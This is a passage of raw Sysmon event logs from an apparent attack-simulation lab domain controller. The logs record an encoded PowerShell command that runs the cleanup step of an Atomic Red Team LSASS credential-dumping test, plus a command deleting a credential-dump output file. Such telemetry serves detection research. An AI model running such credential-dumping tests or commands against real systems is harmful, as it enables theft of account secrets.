15:53:06.773{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006138Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.773{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006137Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.773{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006136Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.773{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006135Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.773{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006134Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.773{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006133Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.773{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006132Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.773{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006131Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.773{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006130Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.773{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-4F01-000000008801}4772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006129Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.773{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE2-5FA1-4F01-000000008801}4772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f0374a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f035be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f85dea(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30efc1a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319b5399(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ec499e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f22e6d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f06363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ef82e8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f31478(wow64) 154100x80000000000000006128Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.774{D28789B6-7CE2-5FA1-4F01-000000008801}4772C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "del "%%temp%%\wce-output.txt" >nul 2>&1" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbABlAGEAbgB1AHAA 10341000x80000000000000006127Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.695{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-4E01-000000008801}2500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006126Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.695{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006125Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.695{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006124Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.695{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006123Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.695{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006122Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.695{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006121Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.695{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006120Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.695{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006119Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.695{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006118Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.695{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006117Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.695{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-4E01-000000008801}2500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006116Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.695{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE2-5FA1-4E01-000000008801}2500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program 